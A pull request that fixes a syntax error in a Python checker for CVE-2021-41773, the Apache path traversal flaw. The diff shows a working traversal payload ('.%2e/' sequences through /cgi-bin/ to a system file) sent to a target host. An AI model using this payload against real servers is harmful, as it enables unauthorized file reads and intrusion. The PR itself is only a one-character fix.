### PR TITLE
Fixed SyntaxError: invalid syntax error

### DIFF
--- a/CVE-2021-41773.py
+++ b/CVE-2021-41773.py
@@ -33,7 +33,7 @@ if __name__ == "__main__":
     flag = "bash_completion - programmable completion functions for bash"
     payload = ".%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/usr/share/bash-completion/bash_completion"
 
-    if flag not in requests.get(f"{args.host}/cgi-bin/{payload}").content.decode()):
+    if (flag not in requests.get(f"{args.host}/cgi-bin/{payload}").content.decode()):
         print(f"[-] {args.host} not vulnerable")
         exit(-1)
     


### PR DESCRIPTION
Fixed `SyntaxError: invalid syntax` due to missing `(` in the if condition.